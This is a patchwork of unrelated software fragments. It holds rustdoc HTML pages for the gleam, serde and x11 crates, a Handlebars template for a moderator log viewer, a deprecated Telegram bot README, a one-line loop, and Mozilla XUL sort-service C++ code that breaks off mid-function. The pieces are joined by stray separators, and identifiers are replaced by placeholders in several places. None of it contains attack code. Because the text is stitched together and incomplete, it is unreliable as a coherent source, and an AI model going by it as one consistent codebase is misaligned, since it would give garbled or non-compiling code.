This old browser is unsupported and will most likely display funky
things.
</div>
    <![endif]-->
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>gl</a>::<wbr><a href='index.html'>storage</a></p><script>window.sidebarCurrent = {name: 'VertexAttrib2dv', ty: 'static', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content static">
<h1 class='fqn'><span class='in-band'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>gl</a>::<wbr><a href='index.html'>storage</a>::<wbr><a class='static' href=''>VertexAttrib2dv</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-29873' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#7259-7262' title='goto source code'>[src]</a></span></h1>
<pre class='rust static'>pub static mut VertexAttrib2dv: <a class='struct' href='../../../gleam/gl/struct.FnPtr.html' title='gleam::gl::FnPtr'>FnPtr</a><code> = </code><code>FnPtr {
f: super::missing_fn_panic as *const libc::c_void,
is_loaded: false
}</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
<template name="appLogs">
  {{!-- Moderator-only application log viewer: a filter form (level, message,
        username, IP), a results table rendered from the `applogs` helper,
        and a "More data?" button for loading additional rows. --}}
  {{#if isModerator}}
  <h3>Application logs</h3>
  <div id="logsFilterContainer" class="container">
    <form id="logsFilter" name="logsFilter">
      <div class="row form-items">
        <div class="col-12 form-group">
          <select class="form-control" id="js-level">
            <option>ALL</option>
            <option>INFO</option>
            <option>WARN</option>
            <option>ERROR</option>
          </select>
          {{!-- NOTE(review): all three search inputs share name="searchInput".
                They appear to be read via their ids (js-search*), but the
                duplicate name looks unintentional — confirm before relying
                on form serialization. --}}
          <input id="js-search" name="searchInput" type="text" class="form-control" placeholder="Search logs by message...">
          <input id="js-search-username" name="searchInput" type="text" class="form-control" placeholder="by username">
          <input id="js-search-ip" name="searchInput" type="text" class="form-control" placeholder="by IP">
        </div>
      </div>
      <div class="found-result">
        {{!-- Result count only shown when a filter matched something. --}}
        {{#if filterCount}} Found {{filterCount}} results {{/if}}
      </div>
    </form>
  </div>
  <table class="table">
    <thead>
      <tr>
        <th scope="col">Level</th>
        <th scope="col">Date & Time</th>
        <th scope="col">User</th>
        <th scope="col">Message</th>
        <th scope="col">Additional info</th>
      </tr>
    </thead>
    <tbody>
      {{!-- One row per log entry; levelColor maps the level to a CSS color. --}}
      {{#each applogs}}
      <tr>
        <td style="color: {{levelColor}}">{{level}}</td>
        <td>{{date}}</td>
        <td>{{user}}</td>
        <td>{{message}}</td>
        <td>{{additionalInfo}}</td>
      </tr>
      {{/each}}
    </tbody>
  </table>
  <button id="js-more" class="btn btn-action" style="width: 100%">More data?</button>
  {{else}}
  <h1>This page is for moderators only.</h1>
  {{/if}}
</template>
# BotSire (DEPRECATED)
Telegram Bot API library for NodeJS
**DEPRECATED**
For now to run use: *node --<API key> \<file>*
To Install: *npm install --save botsire* |
X1=-2.0;Y1=-2.0;X2=2.0;Y2=2.0;for (y=0;y<32;y++) {print(y);} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `ArrayVisitor28` struct in crate `serde`.">
<meta name="keywords" content="rust, rustlang, rust-lang, ArrayVisitor28">
<title>serde::de::impls::ArrayVisitor28 - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
    <![endif]-->
<section class="sidebar">
<p class='location'><a href='../../index.html'>serde</a>::<wbr><a href='../index.html'>de</a>::<wbr><a href='index.html'>impls</a></p><script>window.sidebarCurrent = {name: 'ArrayVisitor28', ty: 'struct', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content struct">
<h1 class='fqn'><span class='in-band'>Struct <a href='../../index.html'>serde</a>::<wbr><a href='../index.html'>de</a>::<wbr><a href='index.html'>impls</a>::<wbr><a class='struct' href=''>ArrayVisitor28</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-18840' class='srclink' href='../../../src/serde/de/impls.rs.html#475-477' title='goto source code'>[src]</a></span></h1>
<pre class='rust struct'>struct ArrayVisitor28<T> {
marker: <a class='struct' href='../../../core/marker/struct.PhantomData.html' title='core::marker::PhantomData'>PhantomData</a><T>,
}</pre><h2 class='fields'>Fields</h2>
<table><tr class='stab '>
<td id='structfield.marker'><code>marker</code></td><td></td></tr></table><h2 id='methods'>Methods</h2><h3 class='impl'><code>impl<T> <a class='struct' href='../../../serde/de/impls/struct.ArrayVisitor28.html' title='serde::de::impls::ArrayVisitor28'>ArrayVisitor28</a><T></code></h3><div class='impl-items'><h4 id='method.new' class='method'><code>fn <a href='#method.new' class='fnname'>new</a>() -> Self</code></h4>
</div><h2 id='implementations'>Trait Implementations</h2><h3 class='impl'><code>impl<T> <a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Visitor</a> for <a class='struct' href='../../../serde/de/impls/struct.ArrayVisitor28.html' title='serde::de::impls::ArrayVisitor28'>ArrayVisitor28</a><T> <span class='where'>where T: <a class='trait' href='../../../serde/de/trait.Deserialize.html' title='serde::de::Deserialize'>Deserialize</a></span></code></h3><div class='impl-items'><h4 id='assoc_type.Value' class='type'><code>type Value = <a href='../../../std/primitive.array.html'>[T; 28]</a></code></h4>
<h4 id='method.visit_seq' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_seq' class='fnname'>visit_seq</a><V>(&mut self, visitor: V) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><<a href='../../../std/primitive.array.html'>[T; 28]</a>, V::Error> <span class='where'>where V: <a class='trait' href='../../../serde/de/trait.SeqVisitor.html' title='serde::de::SeqVisitor'>SeqVisitor</a></span></code></h4>
<h4 id='method.visit_bool' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_bool' class='fnname'>visit_bool</a><E>(&mut self, _v: <a href='../../../std/primitive.bool.html'>bool</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_isize' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_isize' class='fnname'>visit_isize</a><E>(&mut self, v: <a href='../../../std/primitive.isize.html'>isize</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i8' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i8' class='fnname'>visit_i8</a><E>(&mut self, v: <a href='../../../std/primitive.i8.html'>i8</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i16' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i16' class='fnname'>visit_i16</a><E>(&mut self, v: <a href='../../../std/primitive.i16.html'>i16</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i32' class='fnname'>visit_i32</a><E>(&mut self, v: <a href='../../../std/primitive.i32.html'>i32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i64' class='fnname'>visit_i64</a><E>(&mut self, _v: <a href='../../../std/primitive.i64.html'>i64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_usize' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_usize' class='fnname'>visit_usize</a><E>(&mut self, v: <a href='../../../std/primitive.usize.html'>usize</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u8' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u8' class='fnname'>visit_u8</a><E>(&mut self, v: <a href='../../../std/primitive.u8.html'>u8</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u16' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u16' class='fnname'>visit_u16</a><E>(&mut self, v: <a href='../../../std/primitive.u16.html'>u16</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u32' class='fnname'>visit_u32</a><E>(&mut self, v: <a href='../../../std/primitive.u32.html'>u32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u64' class='fnname'>visit_u64</a><E>(&mut self, _v: <a href='../../../std/primitive.u64.html'>u64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_f32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_f32' class='fnname'>visit_f32</a><E>(&mut self, v: <a href='../../../std/primitive.f32.html'>f32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_f64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_f64' class='fnname'>visit_f64</a><E>(&mut self, _v: <a href='../../../std/primitive.f64.html'>f64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_char' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_char' class='fnname'>visit_char</a><E>(&mut self, v: <a href='../../../std/primitive.char.html'>char</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_str' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_str' class='fnname'>visit_str</a><E>(&mut self, _v: &<a href='../../../std/primitive.str.html'>str</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_string' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_string' class='fnname'>visit_string</a><E>(&mut self, v: <a class='struct' href='../../../collections/string/struct.String.html' title='collections::string::String'>String</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_unit' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_unit' class='fnname'>visit_unit</a><E>(&mut self) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_unit_struct' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_unit_struct' class='fnname'>visit_unit_struct</a><E>(&mut self, _name: &'static <a href='../../../std/primitive.str.html'>str</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_none' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_none' class='fnname'>visit_none</a><E>(&mut self) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_some' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_some' class='fnname'>visit_some</a><D>(&mut self, _deserializer: &mut D) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, D::Error> <span class='where'>where D: <a class='trait' href='../../../serde/de/trait.Deserializer.html' title='serde::de::Deserializer'>Deserializer</a></span></code></h4>
<h4 id='method.<API key>' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.<API key>' class='fnname'><API key></a><D>(&mut self, _deserializer: &mut D) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, D::Error> <span class='where'>where D: <a class='trait' href='../../../serde/de/trait.Deserializer.html' title='serde::de::Deserializer'>Deserializer</a></span></code></h4>
<h4 id='method.visit_map' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_map' class='fnname'>visit_map</a><V>(&mut self, _visitor: V) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, V::Error> <span class='where'>where V: <a class='trait' href='../../../serde/de/trait.MapVisitor.html' title='serde::de::MapVisitor'>MapVisitor</a></span></code></h4>
<h4 id='method.visit_bytes' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_bytes' class='fnname'>visit_bytes</a><E>(&mut self, _v: <a href='../../../std/primitive.slice.html'>&[</a><a href='../../../std/primitive.u8.html'>u8</a><a href='../../../std/primitive.slice.html'>]</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_byte_buf' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_byte_buf' class='fnname'>visit_byte_buf</a><E>(&mut self, v: <a class='struct' href='../../../collections/vec/struct.Vec.html' title='collections::vec::Vec'>Vec</a><<a href='../../../std/primitive.u8.html'>u8</a>>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
</div></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "serde";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XtRemoveActionHook` fn in crate `x11`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XtRemoveActionHook">
<title>x11::xt::XtRemoveActionHook - Rust</title>
<link rel="stylesheet" type="text/css" href="../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<nav class="sidebar">
<p class='location'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>xt</a></p><script>window.sidebarCurrent = {name: 'XtRemoveActionHook', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>xt</a>::<wbr><a class='fn' href=''>XtRemoveActionHook</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-18939' class='srclink' href='../../src/x11/link.rs.html#14' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub unsafe extern fn XtRemoveActionHook(_1: <a class='primitive' href='../../std/primitive.pointer.html'>*mut </a><a class='enum' href='../../std/os/raw/enum.c_void.html' title='std::os::raw::c_void'>c_void</a>)</pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../";
window.currentCrate = "x11";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script defer src="../../search-index.js"></script>
</body>
</html> |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/*
This file provides the implementation for the sort service manager.
*/
#include "nsCOMPtr.h"
#include "nsIContent.h"
#include "nsIDOMElement.h"
#include "nsIDOMNode.h"
#include "nsIServiceManager.h"
#include "nsGkAtoms.h"
#include "nsNameSpaceManager.h"
#include "nsXULContentUtils.h"
#include "nsString.h"
#include "nsQuickSort.h"
#include "<API key>.h"
#include "nsXULSortService.h"
#include "nsIDOMXULElement.h"
#include "<API key>.h"
#include "nsTemplateMatch.h"
#include "nsICollation.h"
#include "nsUnicharUtils.h"
NS_IMPL_ISUPPORTS(XULSortServiceImpl, nsIXULSortService)
void
XULSortServiceImpl::SetSortHints(nsIContent *aNode, nsSortState* aSortState)
{
// Records the active sort key and direction as attributes on aNode so the
// state persists on the element after the sort completes.
// set sort and sortDirection attributes when the sort is done
aNode->SetAttr(kNameSpaceID_None, nsGkAtoms::sort,
aSortState->sort, true);
nsAutoString direction;
if (aSortState->direction == <API key>)
direction.AssignLiteral("descending");
else if (aSortState->direction == <API key>)
direction.AssignLiteral("ascending");
// natural order leaves 'direction' empty
aNode->SetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
direction, true);
// for trees, also set the sort info on the currently sorted column
if (aNode->NodeInfo()->Equals(nsGkAtoms::tree, kNameSpaceID_XUL)) {
if (aSortState->sortKeys.Count() >= 1) {
// only the primary sort key is reflected on the column header
nsAutoString sortkey;
aSortState->sortKeys[0]->ToString(sortkey);
SetSortColumnHints(aNode, sortkey, direction);
}
}
}
void
XULSortServiceImpl::SetSortColumnHints(nsIContent *content,
const nsAString &sortResource,
const nsAString &sortDirection)
{
// set sort info on current column. This ensures that the
// column header sort indicator is updated properly.
// Recurses through <treecols> wrappers; the matching <treecol> is marked
// active while every other sortable column has its state cleared.
for (nsIContent* child = content->GetFirstChild();
child;
child = child->GetNextSibling()) {
if (child->IsXULElement(nsGkAtoms::treecols)) {
SetSortColumnHints(child, sortResource, sortDirection);
} else if (child->IsXULElement(nsGkAtoms::treecol)) {
nsAutoString value;
child->GetAttr(kNameSpaceID_None, nsGkAtoms::sort, value);
// also check the resource attribute for older code
if (value.IsEmpty())
child->GetAttr(kNameSpaceID_None, nsGkAtoms::resource, value);
if (value == sortResource) {
child->SetAttr(kNameSpaceID_None, nsGkAtoms::sortActive,
NS_LITERAL_STRING("true"), true);
child->SetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
sortDirection, true);
// Note: don't break out of loop; want to set/unset
// attribs on ALL sort columns
} else if (!value.IsEmpty()) {
// a different sortable column: clear its indicator state
child->UnsetAttr(kNameSpaceID_None, nsGkAtoms::sortActive,
true);
child->UnsetAttr(kNameSpaceID_None, nsGkAtoms::sortDirection,
true);
}
}
}
}
nsresult
XULSortServiceImpl::GetItemsToSort(nsIContent *aContainer,
nsSortState* aSortState,
nsTArray<contentSortInfo>& aSortItems)
{
// Collects the children of aContainer that participate in the sort into
// aSortItems. Template-built content is delegated to the builder; plain
// content uses the direct children (for trees, the <treechildren> child
// acts as the real container).
// if there is a template attached to the sort node, use the builder to get
// the items to be sorted
nsCOMPtr<nsIDOMXULElement> element = do_QueryInterface(aContainer);
if (element) {
nsCOMPtr<<API key>> builder;
element->GetBuilder(getter_AddRefs(builder));
if (builder) {
// the query processor is also cached on the sort state for use by
// the comparison callback
nsresult rv = builder->GetQueryProcessor(getter_AddRefs(aSortState->processor));
if (NS_FAILED(rv) || !aSortState->processor)
return rv;
return <API key>(aContainer, builder, aSortState, aSortItems);
}
}
// if there is no template builder, just get the children. For trees,
// get the treechildren element as use that as the parent
nsCOMPtr<nsIContent> treechildren;
if (aContainer->NodeInfo()->Equals(nsGkAtoms::tree, kNameSpaceID_XUL)) {
nsXULContentUtils::FindChildByTag(aContainer,
kNameSpaceID_XUL,
nsGkAtoms::treechildren,
getter_AddRefs(treechildren));
if (!treechildren)
return NS_OK;
aContainer = treechildren;
}
for (nsIContent* child = aContainer->GetFirstChild();
child;
child = child->GetNextSibling()) {
contentSortInfo* cinfo = aSortItems.AppendElement();
if (!cinfo)
return <API key>;
cinfo->content = child;
}
return NS_OK;
}
nsresult
XULSortServiceImpl::<API key>(nsIContent* aContainer,
<API key>* aBuilder,
nsSortState* aSortState,
nsTArray<contentSortInfo>& aSortItems)
{
// Gathers template-generated items: children that map to a builder result
// are appended to aSortItems; children without a result are searched
// recursively, except beneath <template> elements themselves.
for (nsIContent* child = aContainer->GetFirstChild();
child;
child = child->GetNextSibling()) {
nsCOMPtr<nsIDOMElement> childnode = do_QueryInterface(child);
nsCOMPtr<<API key>> result;
nsresult rv = aBuilder->GetResultForContent(childnode, getter_AddRefs(result));
NS_ENSURE_SUCCESS(rv, rv);
if (result) {
// template-generated node: remember both the content and its result
contentSortInfo* cinfo = aSortItems.AppendElement();
if (!cinfo)
return <API key>;
cinfo->content = child;
cinfo->result = result;
}
else if (!aContainer->IsXULElement(nsGkAtoms::_template)) {
rv = <API key>(child, aBuilder, aSortState, aSortItems);
NS_ENSURE_SUCCESS(rv, rv);
}
}
return NS_OK;
}
int
testSortCallback(const void *data1, const void *data2, void *privateData)
{
// Comparison callback handed to NS_QuickSort. Compares two contentSortInfo
// entries according to the nsSortState carried in privateData, returning
// <0, 0 or >0 in the usual qsort convention.
// (Fix: this explanatory note was previously a bare, uncommented line of
// prose inside the function body, which cannot compile.)
contentSortInfo *left = (contentSortInfo *)data1;
contentSortInfo *right = (contentSortInfo *)data2;
nsSortState* sortState = (nsSortState *)privateData;
int32_t sortOrder = 0;
if (sortState->direction == nsSortState_natural && sortState->processor) {
// sort in natural order
sortState->processor->CompareResults(left->result, right->result,
nullptr, sortState->sortHints, &sortOrder);
}
else {
int32_t length = sortState->sortKeys.Count();
for (int32_t t = 0; t < length; t++) {
// for templates, use the query processor to do sorting
if (sortState->processor) {
sortState->processor->CompareResults(left->result, right->result,
